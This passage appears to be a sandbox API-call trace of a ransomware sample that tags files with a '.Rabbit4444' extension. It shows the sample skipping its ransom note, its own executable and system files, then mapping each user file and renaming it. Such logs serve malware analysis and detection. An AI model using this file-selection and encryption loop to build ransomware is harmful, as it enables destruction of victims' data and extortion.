lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.727] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15903789972) returned 1 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0067.727] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.727] CloseHandle (hObject=0x29c) returned 1 [0067.727] CloseHandle (hObject=0x280) returned 1 [0067.727] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1266D82E-09AF-4573-B530-14687B493988}.Rabbit4444") returned 156 [0067.728] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1266D82E-09AF-4573-B530-14687B493988}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1266d82e-09af-4573-b530-14687b493988}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1266D82E-09AF-4573-B530-14687B493988}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1266d82e-09af-4573-b530-14687b493988}.rabbit4444"), dwFlags=0x1) returned 1 [0067.771] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98834842, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98834842, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", cAlternateFileName="{1312A~1")) returned 1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="Rabbit4444.exe") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2=".") returned 1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="..") returned 1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="windows") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="bootmgr") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="pagefile.sys") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="boot") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="ids.txt") returned -1 [0067.771] lstrcmpiW (lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", lpString2="NTUSER.DAT") returned -1 [0067.771] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}" | out: lpString1="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}") returned="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}" [0067.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}", dwFileAttributes=0x0) returned 1 [0067.772] lstrlenW (lpString="{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}") returned 38 [0067.772] lstrlenW (lpString="Rabbit4444") returned 10 [0067.772] lstrcmpiW (lpString1="E9F16657A}", lpString2="Rabbit4444") returned -1 [0067.772] lstrlenW (lpString=".dll") returned 4 [0067.772] lstrcmpiW (lpString1="57A}", lpString2=".dll") returned 1 [0067.772] lstrlenW (lpString=".lnk") returned 4 [0067.772] lstrcmpiW (lpString1="57A}", lpString2=".lnk") returned 1 [0067.772] lstrlenW (lpString=".ini") returned 4 [0067.772] lstrcmpiW (lpString1="57A}", lpString2=".ini") returned 1 [0067.772] lstrlenW (lpString=".sys") returned 4 [0067.772] lstrcmpiW (lpString1="57A}", lpString2=".sys") returned 1 [0067.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1312adbb-3d3b-423f-aa97-1a3e9f16657a}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.773] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.773] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15908343946) returned 1 [0067.773] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0067.773] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.774] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.776] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15908657313) returned 1 [0067.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.776] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0067.776] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.776] CloseHandle (hObject=0x29c) returned 1 [0067.776] CloseHandle (hObject=0x280) returned 1 [0067.776] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}.Rabbit4444") returned 156 [0067.776] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1312adbb-3d3b-423f-aa97-1a3e9f16657a}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1312ADBB-3D3B-423F-AA97-1A3E9F16657A}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1312adbb-3d3b-423f-aa97-1a3e9f16657a}.rabbit4444"), dwFlags=0x1) returned 1 [0067.777] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b74b076, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b74b076, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{13195EA8-15F2-47D9-A532-E81062D4B757}", cAlternateFileName="{13195~1")) returned 1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="Rabbit4444.exe") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2=".") returned 1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="..") returned 1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="windows") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="bootmgr") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="pagefile.sys") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="boot") returned -1 [0067.777] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="ids.txt") returned -1 [0067.778] lstrcmpiW (lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}", lpString2="NTUSER.DAT") returned -1 [0067.778] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{13195EA8-15F2-47D9-A532-E81062D4B757}" | out: lpString1="{13195EA8-15F2-47D9-A532-E81062D4B757}") returned="{13195EA8-15F2-47D9-A532-E81062D4B757}" [0067.778] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{13195EA8-15F2-47D9-A532-E81062D4B757}", dwFileAttributes=0x0) returned 1 [0067.778] lstrlenW (lpString="{13195EA8-15F2-47D9-A532-E81062D4B757}") returned 38 [0067.778] lstrlenW (lpString="Rabbit4444") returned 10 [0067.778] lstrcmpiW (lpString1="062D4B757}", lpString2="Rabbit4444") returned -1 [0067.779] lstrlenW (lpString=".dll") returned 4 [0067.779] lstrcmpiW (lpString1="757}", lpString2=".dll") returned 1 [0067.779] lstrlenW (lpString=".lnk") returned 4 [0067.779] lstrcmpiW (lpString1="757}", lpString2=".lnk") returned 1 [0067.779] lstrlenW (lpString=".ini") returned 4 [0067.779] lstrcmpiW (lpString1="757}", lpString2=".ini") returned 1 [0067.779] lstrlenW (lpString=".sys") returned 4 [0067.779] lstrcmpiW (lpString1="757}", lpString2=".sys") returned 1 [0067.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{13195EA8-15F2-47D9-A532-E81062D4B757}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{13195ea8-15f2-47d9-a532-e81062d4b757}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.779] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.779] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15908996922) returned 1 [0067.779] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0067.779] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.782] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.783] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.784] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15909452623) returned 1 [0067.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0067.784] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.784] CloseHandle (hObject=0x29c) returned 1 [0067.784] CloseHandle (hObject=0x280) returned 1 [0067.784] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{13195EA8-15F2-47D9-A532-E81062D4B757}.Rabbit4444") returned 156 [0067.784] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{13195EA8-15F2-47D9-A532-E81062D4B757}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{13195ea8-15f2-47d9-a532-e81062d4b757}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{13195EA8-15F2-47D9-A532-E81062D4B757}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{13195ea8-15f2-47d9-a532-e81062d4b757}.rabbit4444"), dwFlags=0x1) returned 1 [0067.785] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9893f8b9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9893f8b9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", cAlternateFileName="{16DAF~1")) returned 1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="Rabbit4444.exe") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2=".") returned 1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="..") returned 1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="windows") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="bootmgr") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="pagefile.sys") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="boot") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="ids.txt") returned -1 [0067.785] lstrcmpiW (lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", lpString2="NTUSER.DAT") returned -1 [0067.785] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}" | out: lpString1="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}") returned="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}" [0067.785] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}", dwFileAttributes=0x0) returned 1 [0067.786] lstrlenW (lpString="{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}") returned 38 [0067.786] lstrlenW (lpString="Rabbit4444") returned 10 [0067.786] lstrcmpiW (lpString1="142A0CCD2}", lpString2="Rabbit4444") returned -1 [0067.786] lstrlenW (lpString=".dll") returned 4 [0067.786] lstrcmpiW (lpString1="CD2}", lpString2=".dll") returned 1 [0067.786] lstrlenW (lpString=".lnk") returned 4 [0067.786] lstrcmpiW (lpString1="CD2}", lpString2=".lnk") returned 1 [0067.786] lstrlenW (lpString=".ini") returned 4 [0067.786] lstrcmpiW (lpString1="CD2}", lpString2=".ini") returned 1 [0067.786] lstrlenW (lpString=".sys") returned 4 [0067.786] lstrcmpiW (lpString1="CD2}", lpString2=".sys") returned 1 [0067.786] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{16dafc99-00f8-4c05-a46a-bcb142a0ccd2}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.786] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.786] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15909695957) returned 1 [0067.786] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.786] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.786] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.787] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.789] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15909958305) returned 1 [0067.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.789] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.789] CloseHandle (hObject=0x29c) returned 1 [0067.789] CloseHandle (hObject=0x280) returned 1 [0067.789] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}.Rabbit4444") returned 156 [0067.789] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{16dafc99-00f8-4c05-a46a-bcb142a0ccd2}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{16DAFC99-00F8-4C05-A46A-BCB142A0CCD2}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{16dafc99-00f8-4c05-a46a-bcb142a0ccd2}.rabbit4444"), dwFlags=0x1) returned 1 [0067.791] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98775c73, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98775c73, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", cAlternateFileName="{197DF~1")) returned 1 [0067.791] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.791] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.791] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="Rabbit4444.exe") returned -1 [0067.791] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2=".") returned 1 [0067.791] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="..") returned 1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="windows") returned -1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="bootmgr") returned -1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="pagefile.sys") returned -1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="boot") returned -1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="ids.txt") returned -1 [0067.792] lstrcmpiW (lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", lpString2="NTUSER.DAT") returned -1 [0067.792] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}" | out: lpString1="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}") returned="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}" [0067.792] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}", dwFileAttributes=0x0) returned 1 [0067.792] lstrlenW (lpString="{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}") returned 38 [0067.792] lstrlenW (lpString="Rabbit4444") returned 10 [0067.792] lstrcmpiW (lpString1="57DC8BFF8}", lpString2="Rabbit4444") returned -1 [0067.792] lstrlenW (lpString=".dll") returned 4 [0067.792] lstrcmpiW (lpString1="FF8}", lpString2=".dll") returned 1 [0067.792] lstrlenW (lpString=".lnk") returned 4 [0067.792] lstrcmpiW (lpString1="FF8}", lpString2=".lnk") returned 1 [0067.792] lstrlenW (lpString=".ini") returned 4 [0067.792] lstrcmpiW (lpString1="FF8}", lpString2=".ini") returned 1 [0067.792] lstrlenW (lpString=".sys") returned 4 [0067.792] lstrcmpiW (lpString1="FF8}", lpString2=".sys") returned 1 [0067.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{197dfb5f-c4aa-4b34-9390-72c57dc8bff8}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 